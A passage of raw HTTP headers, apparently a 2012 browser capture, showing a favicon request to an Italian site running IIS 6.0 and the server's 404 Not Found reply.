Content-Type: text/html

Date: Sun, 11 Nov 2012 01:57:29 GMT
Content-Length: 1635
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /favicon.ico HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD; __utma=248128083.1212871960.1352599045.1352599045.1352599045.1; __utmb=248128083; __utmc=248128083; __utmz=248128083.1352599045.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Sun, 11 Nov 2012 01:57:32 GMT
Content-Length: 1635
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET